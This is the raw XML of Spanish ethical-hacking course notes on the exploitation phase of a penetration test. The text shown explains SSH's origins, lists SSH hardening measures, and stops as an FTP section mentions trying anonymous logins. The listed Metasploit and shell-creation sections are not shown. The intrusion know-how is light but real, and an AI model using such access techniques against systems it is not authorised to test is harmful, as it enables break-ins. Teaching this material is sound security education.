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spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python para Hacking ético</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apuntes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:color w:val="cfda2d"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:color w:val="cfda2d"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Junio 2022-2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:color w:val="cfda2d"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId7" w:type="default"/>
          <w:footerReference r:id="rId8" w:type="default"/>
          <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
          <w:pgMar w:bottom="426" w:top="567" w:left="1701" w:right="1701" w:header="708" w:footer="708"/>
          <w:pgNumType w:start="1"/>
        </w:sect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0" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AURKIBIDEA</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iycblfaqpc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Qué es la explotación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btbaa8y3h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Servicios comunes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kvgrnuzgzs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SSH</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p4snjtsxo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FTP</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7qyafe3dwd4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Metasploit Framework</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dqsehyuh7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Primeros pasos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scj7dannu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Explotando vulnerabilidades</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y275b3e4z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En Metasploit</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hlntmkrrjy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Sin usar Metasploit</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ixjxflkn0nf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Creación de shells</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8m7hrgahhyl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Bibliografía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spacing w:after="0" w:before="170" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId9" w:type="default"/>
          <w:footerReference r:id="rId10" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
          <w:pgMar w:bottom="426" w:top="567" w:left="1701" w:right="1701" w:header="708" w:footer="708"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.iycblfaqpcw4" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Qué es la explotación</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hemos llegado ya a la fase cuyo objetivo es obtener un acceso al sistema que nos permita explotar sus vulnerabilidades, utilizando para ello diversas técnicas tales como: interactuar con los servicios enumerados previamente, manejo de exploits propios o públicos, ingeniería social… Es muy importante que la información recabada en la fase de enumeración haya sido fidedigna y enriquecedora; esto hará que las probabilidades de éxito en esta nueva fase sean muy altas. Se trata de una fase que nos permite obtener acceso privilegiado a los sistemas objetivo para evaluar la seguridad de la red. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:hanging="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.op7i8cbfp1k1" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Servicios comunes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="792" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kvgrnuzgzsa1" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH</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Telnet (TELetype NETwork) es un protocolo cliente-servidor desarrollado en 1969 y utilizado para proporcionar acceso a un equipo remoto. Por aquel entonces, la seguridad no era una cuestión de importancia, dado que no había grandes redes de ordenadores y no existía la idea de interconectar todas ellas. En los años 90, sin embargo, con el boom de Internet, la seguridad cobró mayor importancia y quedaron al descubierto las debilidades del protocolo, destacando el hecho de que no encripta los datos enviados durante la conexión, entre ellos las credenciales de los usarios.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Por eso es por lo que surge SSH (SecureShell), que ofrece un canal de comunicaciones, un túnel, seguro por el que viajan los datos encriptados. La versíon 1 de SSH apareció en el año 1995, y en 2006 apareció la 2.0; aporta ésta sustanciales mejoras en materia de seguridad con respecto a la versión anterior, implantando algoritmos de encriptación más fuertes.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problema con este tipo de servicios es que son privados (en el sentido en el que no nos interesa que sean accesibles por muchos usuarios -a diferencia de un servicio http o htts, por ejemplo-, pero deben poder ser utilizados remotamente. Lo que ocurre es que muchas veces no se le da la importancia que tiene este asunto, y, desgraciadamente, son muy numerosos los servicios ssh que están accesibles de manera sencilla en Internet.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minimizar los riesgos de seguridad relativos a lo explicado, conviene robustecer el servicio ssh (además de tomas las medidas pertinentes en firewalls intermedios) con ciertas medidas, algunas de las cuales son de muy fácil implementación:</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20" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="both"/>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Restringir el acceso al servidor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Limitar las interfaces en que escucha el servidor usando la opción </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ListenAdress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21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="113" w:before="113" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restringir el número de intentos de autenticación</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Es conveniente poner un número de intentos bajo de cara a dificultar la autenticación a los intrusos. Hay que tener en cuenta que en muchos casos esos intrusos son bots que, si tienen un número de intentos muy alto, tendrán más fácil acceder probando con diferentes contraseñas. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="113" w:before="113" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Permitir únicamente la versión 2 del protocolo SSH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. La versión 1 es menos segura, y todos los servidores y clientes actuales soportan la versión 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="113" w:before="113" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cambiar el puerto de escucha</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Muchos de los intentos de ataque van dirigidos a servidores SSH que escuchan en el puerto 22. Aunque cambiar el puerto de escucha no protege frente a ataques dirigidos, sí evitará muchos intentos. Lo mejor es usar un puerto no privilegiado, como, por ejemplo, el 50000.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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13" w:before="113" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restringir los usuarios que pueden acceder al servicio.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se puede permitir selectivamente que solamente accedan ciertos usuarios y/o grupos. Alternativamente, se puede denegar selectivamente el acceso a ciertos usuarios y/o grupos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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13" w:before="113" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prohibir el acceso como root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Todos los sistemas GNU/Linux tienen un usuario </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si permitimos la conexión mediante ese usuario, el atacante lo podrá usar para intentar loguearse, y, de hacerlo, tomará el control del equipo con todos los privilegios. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="113" w:before="113" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Habilitar el uso de la criptografía asimétrica. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizar la criptografía asimétrica para la autenticación de los clientes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.cp4snjtsxosu" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="f7f7f8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No vamos a detenernos a explicar los pormenores de este servicio, pero sí conviene resaltar algunas técnicas asociadas a él que pueden ayudarnos en la fase de explotación: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="f7f7f8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intento de acceso con el usuario anónimo. </w:t>
      </w:r>
    </w:p>
